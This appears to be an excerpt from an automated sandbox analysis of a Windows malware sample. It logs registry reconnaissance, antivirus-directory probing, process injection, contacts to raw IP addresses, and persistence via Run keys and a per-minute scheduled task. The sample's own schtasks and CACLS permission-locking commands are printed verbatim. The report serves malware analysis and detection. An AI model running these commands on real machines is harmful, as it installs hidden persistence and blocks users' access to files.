RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Terminates another process (14 events)

Time & API	Arguments	Status
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2444 process_handle: 0x00000000000002b8
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2444 process_handle: 0x00000000000002b8	1
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2532 process_handle: 0x0000000000000264
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2532 process_handle: 0x0000000000000264	1
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2592 process_handle: 0x000000000000026c
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2592 process_handle: 0x000000000000026c	1
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2628 process_handle: 0x00000000000002c0
NtTerminateProcess May 31, 2023, 5:47 p.m.	status_code: 0xffffffff process_identifier: 2628 process_handle: 0x00000000000002c0	1
NtTerminateProcess May 31, 2023, 5:48 p.m.	status_code: 0xffffffff process_identifier: 2800 process_handle: 0x00000000000002c8
NtTerminateProcess May 31, 2023, 5:48 p.m.	status_code: 0xffffffff process_identifier: 2800 process_handle: 0x00000000000002c8	1
NtTerminateProcess May 31, 2023, 5:48 p.m.	status_code: 0xffffffff process_identifier: 2880 process_handle: 0x00000000000002d0
NtTerminateProcess May 31, 2023, 5:48 p.m.	status_code: 0xffffffff process_identifier: 2880 process_handle: 0x00000000000002d0	1
NtTerminateProcess May 31, 2023, 5:48 p.m.	status_code: 0xffffffff process_identifier: 524 process_handle: 0x00000000000002d8
NtTerminateProcess May 31, 2023, 5:48 p.m.	status_code: 0xffffffff process_identifier: 524 process_handle: 0x00000000000002d8	1

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: a19b13a9bb4286f4fb5c6bbd60c79ec2ee71113f

Communicates with host for which no DNS query was performed (4 events)

host	162.55.188.246
host	162.55.212.236
host	45.159.189.105
host	78.47.9.120

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory May 31, 2023, 5:48 p.m.	process_identifier: 1372 region_size: 868352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000002d4	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation May 31, 2023, 5:48 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

AddInProcess32.exe tried to sleep 2728173 seconds, actually delayed analysis time by 2728173 seconds

Installs itself for autorun at Windows startup (4 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\unsecapp.exe	reg_value	C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\tcpupdate.exe	reg_value	C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW May 31, 2023, 5:48 p.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2852 resumed a thread in remote process 1372
NtResumeThread May 31, 2023, 5:48 p.m.	thread_handle: 0x00000000000002d8 suspend_count: 1 process_identifier: 1372	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\6bb5824ec4" /P "test22:N"
cmdline	CACLS "npsvga64.exe" /P "test22:R" /E
cmdline	CACLS "..\6bb5824ec4" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "npsvga64.exe" /P "test22:N"&&CACLS "npsvga64.exe" /P "test22:R" /E&&echo Y\|CACLS "..\6bb5824ec4" /P "test22:N"&&CACLS "..\6bb5824ec4" /P "test22:R" /E&&Exit
cmdline	CACLS "npsvga64.exe" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "npsvga64.exe" /P "test22:N"&&CACLS "npsvga64.exe" /P "test22:R" /E&&echo Y\|CACLS "..\6bb5824ec4" /P "test22:N"&&CACLS "..\6bb5824ec4" /P "test22:R" /E&&Exit

Executed a process and injected code into it, probably while unpacking (50 out of 168 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW May 31, 2023, 5:46 p.m.	thread_identifier: 2116 thread_handle: 0x000000f8 process_identifier: 2112 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000000ec	1	1
